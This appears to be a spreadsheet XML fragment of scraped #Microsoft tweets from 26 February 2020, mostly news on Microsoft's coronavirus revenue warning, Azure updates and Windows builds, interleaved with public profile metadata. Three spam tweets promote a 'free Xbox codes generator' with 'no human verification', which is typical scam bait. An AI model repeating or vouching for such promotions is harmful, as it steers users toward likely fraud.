    <t>{'id': 2795872703, 'id_str': '2795872703', 'name': 'XOR Data Recovery', 'screen_name': 'XORDataRecovery', 'location': 'Worldwide', 'description': 'Tom and Laurie are global computer information, privacy, security and data recovery consultants. Our mission is to bring your data back from the dead.', 'url': 'https://t.co/3sDgYnaRSL', 'entities': {'url': {'urls': [{'url': 'https://t.co/3sDgYnaRSL', 'expanded_url': 'http://www.xordatarecovery.com', 'display_url': 'xordatarecovery.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 430, 'listed_count': 45, 'created_at': 'Tue Sep 30 18:23:44 +0000 2014', 'favourites_count': 57, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2081,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'http://pbs.twimg.com/profile_images/1193706574629474306/7u5bG4Fv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193706574629474306/7u5bG4Fv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2795872703/1515306466',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</si>
  <si>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22:47:16 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 22:45:11 +0000 2020</t>
  </si>
  <si>
    <t>How to prevent scripting attacks in #Microsoft #Office https://t.co/6nbFcXy4mR #CSO</t>
  </si>
  <si>
    <t>Wed Feb 26 22:43:24 +0000 2020</t>
  </si>
  <si>
    <t>Market Recap: 
OUT:   FOMO / BTFD
IN:       WHO / CDC
#microsoft $msft
@DiMartinoBooth @GaryKaltbaum 
@chigrl @StockCats #cdc #vix</t>
  </si>
  <si>
    <t>{'id': 40273633, 'id_str': '40273633', 'name': 'Reminiscences of an American Capitalist', 'screen_name': '4Awesometweet', 'location': 'California, USA', 'description': 'ðŸ‡ºðŸ‡¸ Trading - Investing  - Humor - 20+ Years Professional Trader / PM', 'url': 'https://t.co/yehByhM8Fm', 'entities': {'url': {'urls': [{'url': 'https://t.co/yehByhM8Fm', 'expanded_url': 'http://www.thefrugalprof.com', 'display_url': 'thefrugalprof.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13845, 'friends_count': 2344, 'listed_count': 234, 'created_at': 'Fri May 15 16:20:46 +0000 2009', 'favourites_count': 60579, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 30768,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'http://pbs.twimg.com/profile_images/479444032506978304/HBwiETIy_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/479444032506978304/HBwiETIy_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40273633/1536606431',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</si>
  <si>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22:42:40 +0000 2020</t>
  </si>
  <si>
    <t>Get Free Xbox Codes Generator Tool Online. Updated on 2020 and 100% working, no human verification.https://t.co/82ZDCLddCfhttps://t.co/9MqyKUZYdl #Xbox #XboxSeriesX #XboxGamePass #EEUU #Microsoft #GiftCards #freexboxcode #freegame #Generator generator https://t.co/tOJ8jRH1x6</t>
  </si>
  <si>
    <t>Wed Feb 26 22:41:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft - $MSFT - more profit warnings!Microsoft says will not meet Q3 2020 More Personal Computing guidance https://t.co/Al0Z6Ba5A5</t>
  </si>
  <si>
    <t>{'id': 1704023976, 'id_str': '1704023976', 'name': 'Domenick Beskos', 'screen_name': 'DomenickBeskos', 'location': 'KÃ¸benhavn, Danmark', 'description': 'Holder of knowledge. Truth should not be confused with popularity it is opposite! Chief Strategist at Momentum Markets with focus on strategic investing', 'url': 'https://t.co/8dMPVMfCS6', 'entities': {'url': {'urls': [{'url': 'https://t.co/8dMPVMfCS6', 'expanded_url': 'http://www.MomentumMarkets.dk', 'display_url': 'MomentumMarkets.dk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1156, 'friends_count': 195, 'listed_count': 5, 'created_at': 'Tue Aug 27 08:02:37 +0000 2013', 'favourites_count': 2185, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2914,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'http://pbs.twimg.com/profile_images/733674481009451008/WHVrA7q2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/733674481009451008/WHVrA7q2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1704023976/1497694108',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</si>
  <si>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22:39:48 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020
#Microsoft #Azure
https://t.co/DJfRSZETG0</t>
  </si>
  <si>
    <t>Wed Feb 26 22:36:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Begins Testing the Automatic Rollout of the New #EdgeChromium to #Windows10 Insiders https://t.co/Xd0M9AueI1 #EdgeBrowser</t>
  </si>
  <si>
    <t>Wed Feb 26 22:36:21 +0000 2020</t>
  </si>
  <si>
    <t>Get free Xbox codes using our new code generator and get free codes from Xbox Live Gold and Xbox Live.https://t.co/YOQJISZqwyhttps://t.co/V8k1ZSFidX #Xbox #XboxGamePass #XboxGamePassUltimate #XboxLive #EEUU #GiftCard #freegame #Microsoft #Generator https://t.co/aJqEn1q6xP</t>
  </si>
  <si>
    <t>Wed Feb 26 22:35:38 +0000 2020</t>
  </si>
  <si>
    <t>Check out "Meet the Founders - Speaker Series &amp;amp; Networking Event" https://t.co/7iFySXkwXz via @Eventbrite @DownToDash_app @Microsoft #DownToDash #NYC #Microsoft</t>
  </si>
  <si>
    <t>{'id': 2784299021, 'id_str': '2784299021', 'name': 'NYC ALL DAY 24/7', 'screen_name': 'nycallday247', 'location': 'New York City', 'description': "We cover the Big Apple 24-7. We're here to celebrate all of the great restaurants, businesses, cultural events, stories and people that make NYC so unique.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7247, 'friends_count': 6652, 'listed_count': 152, 'created_at': 'Thu Sep 25 20:34:51 +0000 2014', 'favourites_count': 52054, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20119, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': 'C0DEED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/590316776816300032/qD-2QABm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/590316776816300032/qD-2QABm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2784299021/1411678479',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</si>
  <si>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22:35:15 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/UXx8GeqzNZ #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 22:33:00 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 22:32:17 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020: https://t.co/3gOKNMxdDE #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:31:16 +0000 2020</t>
  </si>
  <si>
    <t>No surprises here in Microsoft's warning as the supply chain continues to take a hit based on uncertainty caused by the coronavirus. 
#microsoft #technews #technologynews https://t.co/3Bz9Bu9vap</t>
  </si>
  <si>
    <t>{'id': 18460854, 'id_str': '18460854', 'name': 'Shelly Kramer', 'screen_name': 'ShellyKramer', 'location': 'United States', 'description': 'Partner+Analyst @FuturumResearch, #CEO @V3Broadsuite Total geek about #DX #CX #Cybersecurity #IOT #AI #RPA #FutureofWork #HRTech #CIO #CMO  #CISO #Yoga #Dogs', 'url': 'https://t.co/fKlgGofgTb', 'entities': {'url': {'urls': [{'url': 'https://t.co/fKlgGofgTb', 'expanded_url': 'http://www.futurumresearch.com', 'display_url': 'futurumresearch.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 103497, 'friends_count': 63944, 'listed_count': 9436, 'created_at': 'Mon Dec 29 21:44:27 +0000 2008', 'favourites_count': 34807, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 213583, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D16818', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1032399869376225280/fKddwLcw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032399869376225280/fKddwLcw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18460854/1431041660', 'profile_link_color': '21706B', 'profile_sidebar_border_color': '6DBAB1', 'profile_sidebar_fill_color': 'D37E3D', 'profile_text_color': '4F4237', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 22:30:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft releasing #Windows10 #WindowsInsiders Preview Build 19041.84 to #WSUS #WIMVP 
See: https://t.co/BoyaJ4LSG7</t>
  </si>
  <si>
    <t>Wed Feb 26 22:29:57 +0000 2020</t>
  </si>
  <si>
    <t>Just four companies ,#Microsoft, #Apple, #Amazon and #Google-parent Alphabet  accounted for 46.4% of the 2020 total return as of Friday</t>
  </si>
  <si>
    <t>{'id': 4901368529, 'id_str': '4901368529', 'name': 'ÊŸá´€É´É¢á´á´€É´ Ê™á´€á´„Êœ', 'screen_name': 'langmanbach', 'location': 'Lagos | Toronto | London', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 487, 'friends_count': 35, 'listed_count': 41, 'created_at': 'Fri Feb 12 13:48:53 +0000 2016', 'favourites_count': 6161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5839, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1198349216365654016/-fygqVI6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198349216365654016/-fygqVI6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4901368529/1574543554',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</si>
  <si>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22:29:32 +0000 2020</t>
  </si>
  <si>
    <t>Interesting session on #AI: #MicroFocus' @KevinSw85402235 reports: #Microsoft teaching how to improve #machinelearning models so that your results actually help mitigate threats. #RSAC #RSAC2020 https://t.co/vAkDCz5vxS</t>
  </si>
  <si>
    <t>{'id': 357011475, 'id_str': '357011475', 'name': 'Micro Focus Security', 'screen_name': 'MicroFocusSec', 'location': 'Global', 'description': 'Cyber threats are escalating. Take a holistic, analytics-driven approach to securing what matters mostâ€”identities, applications, and data.', 'url': 'https://t.co/2I7ASATzyu', 'entities': {'url': {'urls': [{'url': 'https://t.co/2I7ASATzyu', 'expanded_url': 'https://www.microfocus.com/en-us/trend/security-risk-governance?utm_campaign=00164297', 'display_url': 'microfocus.com/en-us/trend/seâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16602, 'friends_count': 1236, 'listed_count': 636, 'created_at': 'Wed Aug 17 18:16:41 +0000 2011', 'favourites_count': 721, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28874,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'http://pbs.twimg.com/profile_images/903526803725139968/kXfYU72C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/903526803725139968/kXfYU72C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/357011475/1583166296', 'profile_link_color': '0078F0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 22:28:12 +0000 2020</t>
  </si>
  <si>
    <t>This is a constant reminder of how #dominant #microsoft is and how large of a market #cloud is https://t.co/atU0LPHPy9</t>
  </si>
  <si>
    <t>Wed Feb 26 22:27:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/D4Hf6TC9pf #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 22:25:44 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020  https://t.co/UnEyxdVlkR  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Wed Feb 26 22:25:24 +0000 2020</t>
  </si>
  <si>
    <t>The S&amp;amp;P 500 index was up 1.7% earlier in the day but closed lower by 0.4%. The Dow hit a 4-month low. The NASDAQ closed up 0.2%. After the bell #Microsoft warned that it will miss earnings guidance due to the #coronavirus, sending its shares down 1% in after-hours trading.
5/13</t>
  </si>
  <si>
    <t>{'id': 1132900173804331009, 'id_str': '1132900173804331009', 'name': 'MoneyTalk on RTHK Radio3', 'screen_name': 'MoneyTalkRadio3', 'location': 'Hong Kong', 'description': 'A fast moving and topical business and finance show bringing you breaking business and economic news and financial market updates.', 'url': 'https://t.co/E9xf6ysOKh', 'entities': {'url': {'urls': [{'url': 'https://t.co/E9xf6ysOKh', 'expanded_url': 'https://www.rthk.hk/radio/radio3/programme/money_talk', 'display_url': 'rthk.hk/radio/radio3/pâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 216, 'friends_count': 72, 'listed_count': 1, 'created_at': 'Mon May 27 06:43:44 +0000 2019', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2733, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1132900559483047937/w2yq6BFt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1132900559483047937/w2yq6BFt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1132900173804331009/1576015705',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</si>
  <si>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22:24:59 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Who's attending #Microsoft #Ignite in Amsterdam? I will! Let me know if you're there, maybe we can meet </t>
  </si>
  <si>
    <t>Wed Feb 26 22:24:49 +0000 2020</t>
  </si>
  <si>
    <t>Cool! #Microsoft #surface #WindowsInsiders #WindowsTerminal #Windows10 #pcmasterrace https://t.co/ZwfOQe4SFL https://t.co/p5aauTVgRc</t>
  </si>
  <si>
    <t>{'id': 58440512, 'id_str': '58440512', 'name': 'Nazmus S Khandaker', 'screen_name': 'NazmusLabs', 'location': 'MontrÃ©al, QuÃ©bec', 'description': "My opinions change through knowledge &amp; experience. I'm a Muslim (submits to the one and only Creator). Check out my latest content on YouTube!", 'url': 'https://t.co/szJrm53ooD', 'entities': {'url': {'urls': [{'url': 'https://t.co/szJrm53ooD', 'expanded_url': 'http://youtube.com/nazmuslabsvideos', 'display_url': 'youtube.com/nazmuslabsvideâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 264, 'friends_count': 1018, 'listed_count': 14, 'created_at': 'Mon Jul 20 10:20:25 +0000 2009', 'favourites_count': 1157, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6218, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '112536', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1180651005077274626/lswdWY2z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180651005077274626/lswdWY2z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58440512/1569525501', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EBEAE8', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 22:24:09 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/WB4aJguEfW #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:21:58 +0000 2020</t>
  </si>
  <si>
    <t>The future of mixer doesn't bowed well for Microsoft as morale is at an all time low not to mention the money they have put into the service &amp;amp; the streamers they've acquired. 
#Xbox #Mixer #Microsoft #Streaming 
https://t.co/9Bq9UiqSRS</t>
  </si>
  <si>
    <t>{'id': 82465330, 'id_str': '82465330', 'name': 'ADDMoore ðŸŽ® RETRO REPLAY', 'screen_name': 'ADDMoore93', 'location': 'london', 'description': 'â€¢Illustrator â€¢Designer â€¢Photographer â€¢Video Game enthusiast', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 164, 'listed_count': 16, 'created_at': 'Wed Oct 14 21:47:13 +0000 2009', 'favourites_count': 3962, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4610,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'http://pbs.twimg.com/profile_images/899329213119025152/dzXuu8Vs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/899329213119025152/dzXuu8Vs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/82465330/1503251658', 'profile_link_color': '981CEB',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</si>
  <si>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Feb 26 22:21:29 +0000 2020</t>
  </si>
  <si>
    <t>I look forward to joining my colleagues to discuss #Microsoft Open Data Initiative at #Microsoft's 2nd Annual Tech Law Summit hosted by Howard University School of Law https://t.co/L9VjW9x79Z</t>
  </si>
  <si>
    <t>{'id': 4818179658, 'id_str': '4818179658', 'name': 'Qudus Olaniran', 'screen_name': 'MrQuOla', 'location': 'Redmond, WA', 'description': 'Attorney, Microsoft; sport, technology, and politics enthusiast with a side of IP law; tweets are my own musings.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 166, 'listed_count': 3, 'created_at': 'Tue Jan 26 20:58:19 +0000 2016', 'favourites_count': 2462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 655, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/692135458294382592/GRRQbwjS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/692135458294382592/GRRQbwjS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4818179658/1583126159',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</si>
  <si>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22:21:00 +0000 2020</t>
  </si>
  <si>
    <t>{'id': 3314196164, 'id_str': '3314196164', 'name': 'Peter Lewis - on the radio in Hong Kong', 'screen_name': 'MoneyTalkR3', 'location': 'Hong Kong', 'description': "Presenter of Money Talk on RTHK Radio3. Former investment bank global trading head w/35 yrs experience. Any views are my own &amp; don't represent the views of RTHK", 'url': 'https://t.co/XJlIcgCQGF', 'entities': {'url': {'urls': [{'url': 'https://t.co/XJlIcgCQGF', 'expanded_url': 'http://www.peterlewis.com.hk', 'display_url': 'peterlewis.com.hk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1256, 'friends_count': 871, 'listed_count': 29, 'created_at': 'Thu Aug 13 09:26:46 +0000 2015', 'favourites_count': 710, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4358,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'http://pbs.twimg.com/profile_images/1130975744400678912/13nFTFav_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130975744400678912/13nFTFav_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3314196164/1439527776',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</si>
  <si>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22:20:37 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020  https://t.co/YajaCjEMxf  #azure #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:20:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft warns that Windows revenue won't meet its expectations due to Covid-19 #Microsoft #Windows10 #Covid19 https://t.co/Xw7cdSdKPH https://t.co/aZq5G43TbE</t>
  </si>
  <si>
    <t>Wed Feb 26 22:19:26 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/jqtjnv5crK #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 22:19:12 +0000 2020</t>
  </si>
  <si>
    <t>Admins beware! #Microsoft gives heads-up for 'disruptive' changes to authentication in Office 365 email service https://t.co/LcGBd1z4BL via @Hybrid_Circle #Cisco #vmWARE https://t.co/tlBnsbgp5Z</t>
  </si>
  <si>
    <t>Wed Feb 26 22:18:50 +0000 2020</t>
  </si>
  <si>
    <t>{'id': 707316591453724673, 'id_str': '707316591453724673', 'name': 'instant.com.pk', 'screen_name': 'InstantNewsPk', 'location': 'Pakistan', 'description': 'https://t.co/WJLVnHf1zq is the all in one #1 News Network that gives you real-time World-Wide News in single every minute.', 'url': 'https://t.co/U5FfIFDcl4', 'entities': {'url': {'urls': [{'url': 'https://t.co/U5FfIFDcl4', 'expanded_url': 'https://instant.com.pk', 'display_url': 'instant.com.pk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/WJLVnHf1zq', 'expanded_url': 'http://Instant.com.pk', 'display_url': 'Instant.com.pk', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 292, 'friends_count': 54, 'listed_count': 4, 'created_at': 'Tue Mar 08 21:26:31 +0000 2016', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 143262,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'http://pbs.twimg.com/profile_images/1230399255057240064/Bdo8FyBd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230399255057240064/Bdo8FyBd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/707316591453724673/1582185019',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</si>
  <si>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22:18:23 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/KJcYbNVMnO  #Cloud #CloudComputing #Azure #Microsoft via Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 22:17:33 +0000 2020</t>
  </si>
  <si>
    <t>So honored and privileged to be invited to speak at the largest Microsoft Power Platform event in the UAE, Saturday in Dubai.  I am excited to learn from each and every one of you. See you soon! #azure #networking #powerplatform #saturday #microsoft #dynamics #powerapps #cloud https://t.co/6GHt0MflgP</t>
  </si>
  <si>
    <t>{'id': 280670226, 'id_str': '280670226', 'name': 'Dustin Domerese', 'screen_name': 'dustindomerese', 'location': 'Kansas City, MO', 'description': 'Microsoft Nerd - Business Systems Architect and Design Thinking Implementor - Dad to 5 strong willed young men and girls - Husband to an amazing &amp; strong woman', 'url': 'https://t.co/YLmq7KCPPG', 'entities': {'url': {'urls': [{'url': 'https://t.co/YLmq7KCPPG', 'expanded_url': 'http://dynamicconsultantsgroup.com', 'display_url': 'dynamicconsultantsgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 110, 'friends_count': 347, 'listed_count': 19, 'created_at': 'Mon Apr 11 20:18:01 +0000 2011', 'favourites_count': 205, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 907,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'http://pbs.twimg.com/profile_images/1018604900748410880/peiUoBh6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1018604900748410880/peiUoBh6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/280670226/1531689309',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</si>
  <si>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22:17:12 +0000 2020</t>
  </si>
  <si>
    <t>Releasing Windows 10 Insider Preview Build 19041.84 to WSUS https://t.co/R2hFN4kw9M #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:17:11 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/b9md9R4EFr #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:16:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft expects #Windows unit to miss revenue outlook on #Coronavirus
$MSFT said on Wednesday it does not expect to meet the Q3 forecast for its more personal computing business, as a result of the #CoronavirusOutbreak
-1.7% in #AfterHours #trading
https://t.co/cZanide3DG</t>
  </si>
  <si>
    <t>Wed Feb 26 22:16:05 +0000 2020</t>
  </si>
  <si>
    <t>Use Free Xbox Codes Generator Tool Online. Updated on 2020 and 100% working, no human verification.https://t.co/td4u8TynfIhttps://t.co/nrPWKf1foj #Xbox #XboxGamePass #XboxLive #Microsoft #GiftCards #EEUU #February2020 #XboxGamePassUltimate https://t.co/L1DQrFSPD6</t>
  </si>
  <si>
    <t>Wed Feb 26 22:15:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft warns it will miss guidance for segment that includes Windows because of coronavirus https://t.co/3Ff3An6OJe https://t.co/dBFXpYBMT8</t>
  </si>
  <si>
    <t>Wed Feb 26 22:14:49 +0000 2020</t>
  </si>
  <si>
    <t>@AzureCostMgmt + Billing updates  February 2020
- New Power BI reports for Azure reservations and Azure Hybrid Benefit
- Quicker access to help and support
- New videos and learning opportunities
- And more!
https://t.co/0tSqXscAuf
#Azure #Microsoft #Cloud #CostMgmt https://t.co/rsBNRjAxP8</t>
  </si>
  <si>
    <t>Wed Feb 26 22:14:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Lowers PC Unit Revenue Expectations on Coronavirus Impact  #Microsoft
https://t.co/pbK7iiSkA5 https://t.co/kEG7CLc5PQ</t>
  </si>
  <si>
    <t>Wed Feb 26 22:14:03 +0000 2020</t>
  </si>
  <si>
    <t>Learn more about how a field services company optimizes operations with help from #Microsoft and Tidestone https://t.co/yqxaMhORNu 
#FieldService #MSDyn365 #MSDyn365BC https://t.co/zbhUhFTvNW</t>
  </si>
  <si>
    <t>{'id': 863217362, 'id_str': '863217362', 'name': 'Tidestone Solutions', 'screen_name': 'TidestoneSoluti', 'location': 'Portland, ME', 'description': 'Rock-star business process consultants that specialize in Dynamics GP and Dynamics 365 ERP software and cloud solutions, customized for your industry.', 'url': 'https://t.co/U6oB23mV0y', 'entities': {'url': {'urls': [{'url': 'https://t.co/U6oB23mV0y', 'expanded_url': 'http://www.tidestonesolutions.com', 'display_url': 'tidestonesolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 327, 'friends_count': 554, 'listed_count': 27, 'created_at': 'Fri Oct 05 15:20:27 +0000 2012', 'favourites_count': 123, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1299,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'http://pbs.twimg.com/profile_images/2683635575/88eb95bf9512a9a4adb6ee424edf9022_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2683635575/88eb95bf9512a9a4adb6ee424edf9022_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/863217362/1398799314',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</si>
  <si>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22:13:41 +0000 2020</t>
  </si>
  <si>
    <t>The last 24 hours has been crazy. Great photo of the team with Dixon's Carphone Elites...before the night fell and I was ready for  some classic Greg antics! 
#dixonscarphone #microsoft #elites #trainers... https://t.co/J1Jwh0nlHX</t>
  </si>
  <si>
    <t>{'id': 73690266, 'id_str': '73690266', 'name': 'Gregory Nichols', 'screen_name': 'TigerNichols', 'location': 'Reading, England', 'description': '(Ex)Student at the Maling Shaolin Academy in China. Using what I learnt to improve my personal and business life back in the Western World.', 'url': 'https://t.co/v47pewezRJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/v47pewezRJ', 'expanded_url': 'https://kungfucommute.wordpress.com/', 'display_url': 'kungfucommute.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 309, 'friends_count': 234, 'listed_count': 16, 'created_at': 'Sat Sep 12 17:28:45 +0000 2009', 'favourites_count': 338, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4802,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'http://pbs.twimg.com/profile_images/795381908947566596/YZGhTTdx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/795381908947566596/YZGhTTdx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/73690266/1478464662',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</si>
  <si>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22:12:21 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Book 2 15-in Intel Core I7-8650 1 9GHz 16GB 512SSD ( 67 Bids ) #Microsoft #Surface #Book https://t.co/lkJnV642uW  745.17$ Price . 67 Bids Count . End Time: 2020-02-27 15:40:36 PDT</t>
  </si>
  <si>
